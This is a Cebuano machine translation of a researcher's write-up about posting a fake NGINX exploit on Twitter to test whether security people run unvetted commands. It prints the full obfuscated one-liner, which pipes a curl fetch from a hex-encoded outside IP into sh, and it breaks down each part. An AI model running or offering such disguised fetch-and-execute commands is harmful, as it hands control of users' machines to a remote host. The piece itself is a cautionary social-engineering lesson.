Nota. transl.: orihinal nga nota, nga gipatik sa Hunyo 1, nakahukom sa pagpahigayon sa usa ka eksperimento sa taliwala sa mga interesado sa impormasyon sa seguridad. Aron mahimo kini, nag-andam siya usa ka peke nga pagpahimulos alang sa usa ka wala gibutyag nga kahuyangan sa web server ug gi-post kini sa iyang Twitter. Ang iyang mga pangagpas - nga ibutyag dayon sa mga espesyalista nga makakita sa dayag nga paglimbong sa code - dili lamang wala matuman ... Sila milabaw sa tanan nga mga gilauman, ug sa atbang nga direksyon: ang tweet nakadawat og dako nga suporta gikan sa daghang mga tawo nga wala susiha ang sulod niini.
TL; DR: Ayaw gamita ang file pipelining sa sh o bash sa bisan unsang mga kahimtang. Kini usa ka maayong paagi aron mawala ang kontrol sa imong kompyuter.
Gusto nakong ipaambit kanimo ang usa ka mubo nga istorya bahin sa usa ka komiks nga pagpahimulos sa PoC nga gihimo kaniadtong Mayo 31st. Mipakita dayon siya agig tubag sa balita gikan sa , membro (ZDI), nga ang kasayuran bahin sa usa ka pagkahuyang sa NGINX padulong sa RCE (pagpatuman sa layo nga code) sa dili madugay ibutyag. Tungod kay ang NGINX adunay gahum sa daghang mga website, ang balita kinahanglan nga usa ka bomba. Apan tungod sa mga paglangan sa proseso sa "responsableng pagbutyag", ang mga detalye sa nahitabo wala mahibal-an - kini ang standard nga pamaagi sa ZDI.
mahitungod sa vulnerability disclosure sa NGINX
Pagkahuman sa pagtrabaho sa usa ka bag-ong teknik sa obfuscation sa curl, gikutlo nako ang orihinal nga tweet ug "nag-leak sa usa ka nagtrabaho nga PoC" nga gilangkuban sa usa ka linya sa code nga nagpahimulos kuno sa nadiskubre nga pagkahuyang. Siyempre, kini bug-os nga walay pulos. Nagtuo ko nga ma-expose dayon ko, ug sa labing maayo makadawat ko og duha ka retweets (oh well).
sa peke nga pagpahimulos
Apan, dili nako mahunahuna ang sunod nga nahitabo. Nitaas ang pagkapopular sa akong tweet. Katingad-an, sa pagkakaron (15:00 sa oras sa Moscow Hunyo 1) pipila ka mga tawo ang nakaamgo nga kini usa ka peke. Daghang mga tawo ang nag-retweet niini nga walaβy pagsusi niini (labi na ang pagdayeg sa matahum nga mga graphic nga ASCII nga gipagawas niini).
Tan-awa ra kung unsa kini ka matahum!
Samtang kining tanan nga mga loop ug mga kolor maayo, klaro nga ang mga tawo kinahanglan nga magpadagan sa code sa ilang makina aron makita kini. Sa swerte, ang mga browser nagtrabaho sa parehas nga paagi, ug inubanan sa kamatuoran nga dili gyud ko gusto nga makasulod sa ligal nga kasamok, ang code nga gilubong sa akong site naghimo lang og echo nga mga tawag nga wala pagsulay sa pag-install o pagpatuman sa bisan unsang dugang nga code.
Usa ka gamay nga digression: , , ako ug ang ubang mga lalaki gikan sa team Nagdula kami sa lain-laing mga paagi sa pag-obfuscate sa mga curl command sa makadiyot tungod kay kini cool ... ug kami mga geeks. Ang netspooky ug dnz nakadiskubre ug daghang bag-ong mga pamaagi nga daw maayo kaayo para nako. Miapil ko sa kalingawan ug misulay sa pagdugang sa IP decimal conversion sa bag sa mga limbong. Kini nahimo nga IP mahimo usab nga makombertir sa hexadecimal format. Dugang pa, ang curl ug kadaghanan sa ubang mga gamit sa NIX malipayong mokaon sa hexadecimal IPs! Busa kini usa lamang ka butang sa paghimo og usa ka makapakombinsir ug luwas nga tan-awon nga command line. Sa katapusan nakahukom ko niini nga usa:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostSocio-electronic engineering (SEE) - labaw pa sa phishing
Ang kaluwasan ug pagkapamilyar maoy dakong bahin niini nga eksperimento. Sa akong hunahuna sila ang hinungdan sa iyang kalampusan. Ang command line klaro nga nagpasabot sa seguridad pinaagi sa paghisgot sa "127.0.0.1" (ang iladong localhost). Ang Localhost gikonsiderar nga luwas ug ang datos niini dili mobiya sa imong kompyuter.
Ang pagkapamilyar mao ang ikaduhang yawe nga SEE nga bahin sa eksperimento. Tungod kay ang target audience nag-una nga naglangkob sa mga tawo nga pamilyar sa mga sukaranan sa seguridad sa kompyuter, importante ang paghimo og code aron ang mga bahin niini daw pamilyar ug pamilyar (ug busa luwas). Ang paghulam sa mga elemento sa daan nga mga konsepto sa pagpahimulos ug paghiusa niini sa dili kasagaran nga paagi napamatud-an nga malampuson kaayo.
Sa ubos mao ang usa ka detalyado nga pagtuki sa one-liner. Ang tanan niini nga lista gisul-ob kosmetiko nga kinaiya, ug halos walay gikinahanglan alang sa aktuwal nga operasyon niini.
Unsa nga mga sangkap ang kinahanglan gyud? Kini -gsS, -O 0x0238f06a, |sh ug ang web server mismo. Ang web server walay bisan unsang malisyosong instruksyon, apan nagsilbi lang nga ASCII graphics gamit ang mga command echo sa script nga anaa sa index.html. Sa diha nga ang user misulod sa usa ka linya uban sa |sh sa tunga-tunga, index.html gikarga ug gipatuman. Maayo na lang, ang mga tig-atiman sa web server walay daotang tuyo.
-
../../../%00- nagrepresentar sa pag-adto sa unahan sa direktoryo; -
ngx_stream_module.soβ dalan paingon sa random NGINX module; -
/bin/sh%00<'protocol:TCP'- naglusad kuno mi/bin/shsa target nga makina ug i-redirect ang output sa TCP channel; -
-O 0x0238f06a#PLToffset- tinago nga sangkap, gidugang#PLToffset, aron tan-awon sama sa usa ka memory offset sa usa ka paagi nga anaa sa PLT; -
|sh;- laing importante nga tipik. Kinahanglan namon nga i-redirect ang output sa sh/bash aron mapatuman ang code nga gikan sa nag-atake nga web server nga nahimutang sa0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- usa ka dummy diin gipasabut sa netcat/dev/tcp/localhostaron ang tanan tan-awon nga luwas pag-usab. Sa pagkatinuod, kini wala'y mahimo ug gilakip sa linya sa katahum.
Gitapos niini ang pag-decode sa usa ka linya nga script ug ang paghisgot sa mga aspeto sa "socio-electronic engineering" (intricate phishing).
Web Server Configuration ug Countermeasures
Tungod kay ang kadaghanan sa akong mga subscriber kay infosec/hacker, nakahukom ko nga himoon ang web server nga mas makasugakod sa mga ekspresyon sa βinteresβ sa ilang bahin, aron lang nga ang mga lalaki adunay buhaton (ug kini makalingaw sa gibutang). Dili nako ilista ang tanan nga mga lit-ag dinhi tungod kay ang eksperimento nagpadayon pa, apan ania ang pipila ka mga butang nga gibuhat sa server:
- Aktibo nga nagmonitor sa mga pagsulay sa pag-apod-apod sa pipila ka mga social network ug gipuli ang lainlaing mga thumbnail sa preview aron madasig ang tiggamit sa pag-klik sa link.
- Gi-redirect ang Chrome/Mozilla/Safari/etc sa Thugcrowd promotional video imbes nga ipakita ang shell script.
- Nagtan-aw alang sa OBVIOUS nga mga timailhan sa pagsulod / dayag nga pag-hack, ug dayon magsugod sa pag-redirect sa mga hangyo sa NSA servers (ha!).
- Nag-instalar sa usa ka Trojan, ingon man usa ka BIOS rootkit, sa tanan nga mga kompyuter kansang mga tiggamit mibisita sa host gikan sa usa ka regular nga browser (nagkadlaw lang!).
Usa ka gamay nga bahin sa antimer
Niini nga kaso, ang akong bugtong tumong mao ang pag-master sa pipila ka mga bahin sa Apache - ilabi na, ang mga cool nga mga lagda alang sa pag-redirect sa mga hangyo - ug ako naghunahuna: nganong dili?
NGINX Exploit (Tinuod!)
Pag-subscribe sa sa Twitter ug sundan ang maayong buhat sa ZDI sa pagsulbad sa tinuod nga mga kahuyangan ug pagpahimulos sa mga oportunidad sa NGINX. Ang ilang trabaho kanunay nga nakapadani kanako ug ako mapasalamaton kang Alice sa iyang pasensya sa tanan nga mga paghisgot ug mga pahibalo nga gipahinabo sa akong binuang nga tweet. Maayo na lang, nakahimo usab kini og pipila ka maayo: nakatabang kini sa pagpataas sa kahibalo sa mga kahuyangan sa NGINX, ingon man sa mga problema nga gipahinabo sa pag-abuso sa curl.
Source: www.habr.com